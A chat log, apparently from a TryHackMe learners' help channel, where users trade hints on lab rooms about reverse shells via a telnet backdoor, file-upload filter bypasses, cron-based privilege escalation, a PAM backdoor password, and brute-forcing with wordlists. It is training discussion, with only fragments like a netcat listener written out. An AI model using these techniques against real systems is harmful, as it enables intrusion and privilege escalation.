Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server

I'm stuck at this part, don't know which server I'm supposed to log in into

the target vm

ah ok you grabbed the key, not use it 🙂

same VM should also have the service you need

normally you already portscanned the machine

hi all, i trying room of SESH Birthday CTF
i'm hitting the wall to get the username, i have found the password in the totallytopsecret.pdf

however, i'm stuck ---- to get the username

am i in the right path, as the hint mentioned stored address or phone number

I figured it out, i had a - instead of _ 😫

Stuck on Burp Suite Task 10, i do not have any from Juice Shop with the set-cookie in the header

Tried running the payload again but still no response to proceed

Did you browse the "happy path"?

Not today i started over

do you know the name of the structure where burp suite holds the requests from browsing/spidering a web application? That's my hint in conjunction with the happy path.

The http history tab

Trying privesc on retro… should wesng or windows-exploit-suggester help here? Winpeas seems useless for this

That is one where requests are listed but you might find some more info of what I am specifically talking about in Task 7

Im on the last part of Task 10 i never got a set cookie response in the http history tab

Right you need to find that and so I'm trying to give you another area to look in and so let me ask you this: do you know what we use to navigate when we are on the road driving for example?

There are lots of app services that provide this like Google is a big one that provides this

Maps

Correct!

So in Task 7 you'll find this word being used and you'll know where to look.

Task 7 tells you where to look for you to complete Task 10. It's not the only place where you could look as you are looking in the History tab too but it's the best place I think.

And don't forget to check the responses and not the requests for the Set-Cookie header since it is a http response header.

Thank you!

Gave +1 Rep to @oblique vector

@white salmon so I sent it to sequencer and running it. Pause it at analyze now. Then burp suite closes down

I guess you'll have to browse the happy path again

I got it! Thank you for the hints!

awesome! np

Hey there, I'm working on the network service room and I'm stuck on the telnet enumeration task, it's supposed to have a port open, but scanned the target vm using -sS -sT -sA -sN -sF -sX and -sU and they all say that all ports are closed. Am I being dumb or am I being dumb?

How many ports did you scan? -p- scans all ports on a target machine. Also -vv for verbosity helps a great ton. Lots of information there.

Make sure to scan all ports with "-p-"

thanks! will try

Thanks, seems I was being dumb 😆

good evening people :)

Alright, I'm still stuck on that network service room but now on the telnet exploitation. I have the attack box listening with nc and used the command that was given in the tasks text and prefixed it with .RUN still can't seem get a reverse shell going.

only thing I didn't do exactly like the command is I used the eth0 IP instead of tun0 since I'm using the attack box and I didn't have a tun0 in ifconfig

did you open a listening port on your machine?

Oh yeah you do sorryh

yup used nc lvp 4444

The payload is like starts with mkfifo right?

I'd guess the issue is with the other command, since I'm not getting the message with the payload

I don't have that part

I know I should but I don't know what I done wrong

that whole string that msfvenom spit out onto the terminal starting with mkfifo that whole thing you pasted into the backdoor service input and prefixed with .RUN [exploit]?

ok

so I missed something

I used .RUN msfvenom ...

so that's wrong I guess?

That's incorrect. You should re-read this part:

So I should run it on my local machine instead

try it out

Notice how the text talks about two different things:

**We're going to generate **a reverse shell payload using msfvenom
and at the bottom:
What word does **the generated payload **start with?

msfvenom here is the tool that will be generating the payload. The payload being a reverse shell that we will be running as a system command on the target machine using this open telnet connection.

Ohhhhhhhhh

Thanks @white salmon it ended up working!

Gave +1 Rep to @oblique vector

What is the name used to identify the device responsible for sending data to another network?

Which room ur In ??

Introtolan

It should be router but not accepting the answer

It's not router then if it's not accepting it.

That's my hint.

What can it be then 🤔

Just google the question please

It says transmitter

But it's wrong

So with questions for every task, the questions should be answered based on the information presented in that task.

So read through that information again now that you've read the question and I think you might see it there yourself.

Another tip for you when answering questions is to match the asterisks and if your answer is letters short or has more letters than asterisks then it's not the answer.

Umm ok lemme try to figure it out

Sure! And remember to take your time as you are learning the material. It's okay to read things again and again. Good luck!

tq brovi

Can u tell me the task and question number if u don't mind

yup hold

introduction to lan

A Primer on Subnetting

I got it no worries. Read the context of the task

last question

Yea I just spinned up thm saw that

oh ok

read the given context for the specific

The answer is there :)

oh ok lemme find out

this was the mistake

got the ans

awesome!

thanks brovi

https://tryhackme.com/room/commonlinuxprivesc, task 9:
I'm supposed to guess what command script is running. How do I do that..? It looks like I just changed user or sth, but su is not the answer.

Maybe you should try to find 'script' and then see if you can read it

There's a bunch of gibberish in there, but I just tricked the answer tolerance on the next question, presenting me with the needed command after reloading the page 🙃 the answer is ||ls|| and I really don't know why or how I would have known that because afaic, ||ls|| doesn't do what's seen in the screenshot I sent. 0.o

you can run the script and see how it behaves 🙂

though if it's an ELF file you can probably try to disassemble it

and you'd probably want to use ./script

I feel really dumb right now lol

that happens

it's a silly mistake that happens a lot

you're basically going to abuse that same mistake that the dev made

It also doesn't really help, that script is an actual command (which I just found out), which is why I thought the file "script" was doing sth else 🤦‍♂️

Well, thank you

np

it's a command on that box 🙂

Yeah, that's what I meant

Hello guys!

Please help. I've been struggling on downloading the .ps1 file on the remote machine via jerkins in Alfred room...

This is the error I get always:weary: :weary:

"Unable to connect to the remote host server"

Rooms can't connect to the Internet. Looks like you're trying to download something within the machine direct from the internet and I don't believe that is possible

I'm working on Chill Hack. I've gotten my own public key into the authorized_keys for one of the users, but I'm hitting a wall on privesc. Is there anyone here that's done it that could be so kind as to PM me the slightest whiff of a hint as to which direction I should be looking?

Hello folks! I'm on Upload Vulnerabilities, Task 9, Magic Numbers— I was able to bypass the filter with the Magic Number trick but when they say I'll need to activate the shell by "going directly to its url." I go directly to the URL in browser, the file downloads, but I'm not seeing anything on my listener. Does this mean something isn't right in the script, or I'm performing a step wrong? Or is there another methodology I need to take? Do I need to edit my script to...activate? idk ¯_(ツ)_/¯

do I have to do as bind shell 😦

Hey, How can I get machine credentials?

You'll need to use your VPN ip

I am in room Basic pentesting and I want to log in with ssh. But I dio not know password

Regular Rev shell should work, is your uploaded file correct?

Hey, i am doing attacktive directory room and really stuck on kerbrute tool

as i can't get it with go command

installed go with step by step and i can get hello world as it was from examples to verify go function

but go get github.com/ropnop/kerbrute

nothing happens

nevermind 😄

Hi all, i'm stuck with the room SESH Birthday task 2 question 9, managed to get and decode password from the totallytopsecret.pdf, however not sure am i looking in the correct path at the store address and phone number to get the username

appreciate if someone can give a little hint

the target machines don't have internet access

i don't try to install kerbrute on target

ok then

You need to search for it. Gobuster has a switch that allows for searching with custom extensions on the end (php, txt, etc) use that

Also try not to show answers when posting questions. You do show an answer in that image

Oh yeah my bad, thanks though! I'll try using Gobuster, I used FFUF

FFUF probably has a switch as well

I have never used FFUF tho, lots of tools available that do this

Oh yeah it does have an extension switch, I was overthinking it and was thinking I'd have to use multiple FUZZes, I'll try using the extension switch, that should do it

Thanks again for the help!

Thanks bro, I thought of this as well since there are not in same LAN but I've done something like this before and it worked.. I used it to transfer a file to attackbox I was using then..

Now, I setup a python server but it is only server my directory to 0.0.0.0

Is there a way I can start a server with a specific network interface?
If possible, I will just start the server with my thm VPN ip

Gave +1 Rep to @ashen matrix

0.0.0.0 means everyone can connect

The script you were trying to run is trying to connect to a webserver. You either need to modify the script to point towards your python server and let it download whatever it needs from your machine, or use a different script that doesn't require to connect to another machine to execute.

That answer your question?

I'm using a .php5 extension with the Magic Number changed to indicate GIF at the beginning of the file.

sounds about right

try it with a simple backdoor and see if that works

I'll do pentestmonkey without any Magic Number change

is that how I'm supposed to access the file? Directly to its path in the browser window?

yup

I may have figured it out...

no.

no i haven't

Thanks bro.
I will work on that

Gave +1 Rep to @ashen matrix

@ripe hedge After I've changed the Magic Number, is the extension supposed to sit on top of the body of the text like this? I submitted, went to the URL but it just had the command echoed out on the browser...

WHAT AM I MISSING (╯°□°）╯︵ ┻━┻

you'll need to execute some actual php though

omfg

the parser's probably going mad now

😑

GOT IT

gotta throw out an official thank you for the help!

Gave +1 Rep to @ripe hedge

glad you got it working

don't worry though, sometimes your brain just shuts down and the lizard takes over

I'm really stuck at Pickle Rick ctf

I have been enumerating for the last 2 hours and only found /server-status/ lmao

I have found robot.txt and the username, and advice on how to proceed?

Try using a bigger wordlist

You mean that the medium word list isn't enough?

Ok I'll give it a shot

Wait the directory-list-2.3-medium is the biggest one lmao

there are bigger wordlists. the hint is in the word. If you are using Kali Linux you should have this wordlist already

I use kali

It's in the dirbuster directory right?

nope. the wordlist I used is in the wordlist area. from there maybe try using the 'find' binary to look for it. the name of it is big

Ohhh

I see

So i have been using the wrong wordlist

i wouldnt say wrong

you just need to move to a bigger wordlist if a smaller one is not hitting anything

Ok now i got something

Thanks @ashen matrix

Gave +1 Rep to @ashen matrix

@dire otter also note, sometimes they are just rabbit holes there to annoy and no matter how large a wordlist is, you won't find anything

this isnt the case to be clear

Noted

Other than that, no luck lmao

There is more to find. Big.txt found it for me

Yeah i found nothing

Mind if I DM you?

Nvm found it

Finally

Thanks @ashen matrix

Gave +1 Rep to @ashen matrix

Ffs found the rabbit hole

Basic Pentesting how to brute-force credentials? i wanted to use hydra, but don't know where are wordlist with logins.

Try it in /usr/share/wordlists

https://tryhackme.com/room/rocket Any hints for foothold?

#867914108958281748

Looking for some help, stuck on SMB Task4 . I cannot get current user correct that im currently connected as. Cannot download the file locally

Got the user

So you are fine now?

No stuck at the final step of task 4

I got what i need. User error.

For passwords use rockyou

Thats what i actually used)
I know its a good wordlist

You still didn't get the password after using that?

No, i already finished that room
I had a problem with geting logins, but after few machines restarts i got them

Oh got it. Congrats, man 😄

Thank for trying help)

Gave +1 Rep to @mental quarry

No problem 🙂

In CC: Pen Testing task 4, I can't seem to get gobuster running on the kali browser machine. I've tried searching the system using find. I've tried installing it using sudo apt-get install gobuster, I don't know if the kali machine uses go or if I should try the attackbox. Any suggestions would be greatly appreciated. Thanks in advance.

You installed gobuster on kali? What does the output look like when you run gobuster? And also have you installed golang on kali?

I have tried but it wouldn't let me, and I haven't installed golang yet. I will try

This is what its showing me:

I'm getting similar errors, ie E: Failed to fetch..., when trying to install gobuster

try it without sudo

and you don't need sudo there because you are already superuser

I got the same messages

basically a bunch of 404 errors on IP: 192.99.200.113 80

Here is the output:

This might be the problem from your kali repositories.. have a look at this https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/

And, are your package upgraded and kali up-to-date?

I'm using the in browser version. I made the mistake of accidentally upgrading it and I basically ran out of time before the box was usable again.

by "in browser" the one provided by tryhackme

Ohh the Attackbox

right, but I'm differentiating it because it isn't the "attackbox" but the kali box

but yes

Well, I haven't tried to installed anything on attackbox, personally. So am not sure if I can provide any solutions. But imo, attackbox comes with pre-installation of tools and there might not need to install the tools by the user. See if you locate the tool with locate command

😕 turns up nothing. That being said, maybe I should just jump on the regular old attackbox. And if that doesn't work, I should probably spin up a kali vm. I really appreciate your help

gobuster is available on the Attackbox. Probably should have checked there first. Thank you hellfire0x01

Hints for "Startup"

Can anyone give me?

@ember cosmos What question?

Any hint for Privilege Escalation?

@ember cosmos Look for a file lennie owns that you can adjust.

Is it print.sh?

@ember cosmos you got it.

Yeah but How can I run planner.sh as root?

Now find a way to use that file to get you root access.

you don't need to. if you check crontab that might help you understand.

The crontab is not having any script scheduled to be run

@ember cosmos cron is running the planner.sh file often. Reading that file it also runs the print.sh file which you can edit.

Check the crontab

That's what I'm saying

I expected this in the beginning

@ember cosmos Sorry, pspy shows this running each minute.

principle is still the same. Edit the file and get root.

Thanks

It worked

hey i'm doing the CC: pen Testing and I can't find the answer for the 6th question of the 5th Task. Could someone help me ?

I was thinking about -mutate

Hi, I'm stuck in Sweettooth Inc. room on the Privilege escalation step. I have run linux-smart-enumeration (lse.sh -l 2) and I can't find anything that I can use from there. I'm definitely missing something 😦 Any hints on what I should look for next?

There is a dedicated channel for this room #868235399733055580

@left thunder thanks. I didn't know that. I'll go check there

Gave +1 Rep to @left thunder

Any ideas ?

Have you googled for it already in case you can't find it otherwise?

Yeah for more then an hour
I also looked at the manual online, the github page and the terminal manual

@fallow ibex Copy the question into google, answer is in the first response. (you don't even need to click into it)

xD thx guess i was looking too much for a flag

Gave +1 Rep to @hearty widget

Room Investigating Windows :
i don't understand how too know what tool was used to get Windows passwords..

@median grail which task/question?

there only is one task in this room
and the question is What tool was used to get Windows passwords?

@median grail Start with the task scheduler.

ok

I must be missing something

You're looking for a task. Maybe the actions of that task will help you.

i know, but i don't find what is wrong in the list of tasks

I was not looking in the right place

sorru 😅

@median grail you figured it out?

yes !

super

aloooooooooooooooooooooooo

i'm stucked into the one piece macine (https://tryhackme.com/room/ctfonepiece65)

i've decrypted the hash in the web page source code, but now i'm stucked

someone of you could give me a little hint?

Buffer Overflow prep, I completed OVERFLOW1 and got a shell, just completed OVERFLOW2. However netcat isnt picking up a shell. Is that by design, or am I doing something wrong?

In the network services room on Task 7: Exploiting Telnet I'm not clear on which lhost IP and lport values I should be using. I've tried setting lhost as attacking machine IP and lport values as 4444 but nothing ever happens

Something has happened b/c now when I telnet in I am not getting the standard welcome message which allows you to run .HELP or .RUN etc.

lhost should be your local machine ip

i would do ifconfig on your local machine, find out the ip address of tun0 and then use that for your lhost....

Hey, im struggeling with network services Task 6. where i have to scan the machine and find the open port. When i scan the first 10.000 ports with "nmap -p0-10000 'ip' -Pn" nmap says that all 10.000 ports are filtered. Did i miss something?

Try to define what type of scan you want to perform. So maybe add -sS to your nmap command

Your command works for me. There is no need to set syn scan because is the default. Double check your VPN and target IP.

Oh, that's default anyways. Didn't know that

Okay, I'll try it again tomorrow, thanks

Room: startup. There is file in ||incident|| directory. Can that be transfer on our machine? Because I'm trying to transfer it but it requires password which I don't have. I am a ||www-data|| user. Any nudge?

You mean the attack box right?

Nvm, I figured it out. (:

Yes

Hello all.

Please help your homeboy

I'm having issues getting a reverse shell via msf.

I created the .exe payload from the msfvenom command in the first command in the picture above and I got it transferred to the remote machine with the second command...

I fired msf and set all my required options making sure the parameters are same with what I set up in the .exe payload above...

Once I start the process, I just didn't get any shell:sob: :sob: :sob: :sob:

I noticed, if I run 'Start-Process' as specified in the walkthrough above, it won't be recognized because it is a powershell command and not the native cmd command, so I used 'Start payload.exe'

Is that suppose to be the reason??

yes, the attack box tun0 ip address

drop me a direct message if you still having issues with this 🙂

@bold beacon So what I still don't understand is what exactly the issue is? You are not getting the flag, or you can't find the correct page for this question?

im getting the flag

im not getting the flat

flag*

So what's the url you tried to open in order to receive the flag for this question?

http://10.10.133.124/#/adminstrator

Well then you need to read more carefully, that's not the correct url

Hello, I'm working on the bolt room and I can't figure out the version. The msfconsole used 3.7.0 and I've tried a few different version numbers. Any idea how I can get the version number from the server?

Could even be the first word I'm using. I'm kinda stumped. DM can be sent. Thank you.

someone know what is answer on Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?

because it can't show me the answer

what browser are you using

chrome

@glacial gust

hello I just finish the linux backdoor room but I have just one question about pam_unix.so backdoor, The new password added is "0xmitusrugi" ? and if i want change him I need to replace the string ?

try firefox, that was the one I was able to get it to work on

okay

Hi @graceful pewter you are hardcoding a backdoor password and replacing the library pam_unix.so. Every time you want to change this password you will need recompile and replace the original on /lib/x86_64-linux-gnu/security. If you need any help about please DM.

Sent you a friend request so I can DM you

Looks like I cant DM you unless you r a friend

So I am trying to complete " Sweettooth Inc." room and I can't find what I need to do to become root. Pls help

#868235399733055580

Hi, i was doing steel mountain & got this kind of weird thing, whenever i try to execute any powershell cmd it just dosen't output anything, is this a bug or just kind of windows thing(i'm not very good with windows boxes)

ls is a linux command

PowerShell should accept ls as well (maybe that's depending on the version, not sure about that).
Though I agree @twin mesa you should try native windows commands that you can also use in a normal command prompt

I've tired dir as well but nothing returned

Might be because of the shell itself. You can try these commands in a meterpreter session directly without entering a system shell.

CMD is working fine but not the powershell

Maybe the shell is not stable

this is a possibility

The third task on this page has a problem. I am not able to access the THM{...} code.

https://tryhackme.com/room/whatisnetworking

What should I do?

I did the task the way it was asked. but there was no text box or explanation box, like how it was with other ones.

Did you enter the correct MAC address ?

Because I just tried and it works

yeah. It was replication, right?

What browser you're using ?

I mean spoofing, by copy pasting that other mac... I will check my notif settings.

Yeah it is

Are you doing the room on Google Chrome, Firefox or an other ?

I know that sometimes bugs happen with Chrome on interactive site

Try it in a different browser, or open the site in an own page instead of the splitscreen and do the task, then it's working. https://static-labs.tryhackme.cloud/sites/hotel-wifi/

I am using Edge browser

okay

Try with Firefox maybe

Notifs and most settings including cookies are allowed.

I will try this first... full screen.

How do we do this. no option to open on new tab

That's why I gave you the link

Oh yeah... sorry, did not notice.

thank you sir

No problem, did it work?

yess!

Great 🙂

May I ask something in dm?

Just one more thing if that's happening again. You can open the simulator site as usally in splitscreen, right click that page and inspect, there you will find the link for it in the html code

Ye, go ahead

thank you.

Gave +1 Rep to @left thunder

ow, nice!

Vulnversity task5 priv esc: I managed to get a shell as www-data, and am trying to transfer an enum script from the attack box to the target machine via python3 - m http.server 8080 (while in folder of enum scripts). When I try to wget from target machine as wwwdata, I get a permission denied - cannot write to (name of enum script). Any hint if I'm doing something wrong or if the low priv wwwdata is in general not allowed to do this kind of wget download? Thanks a lot!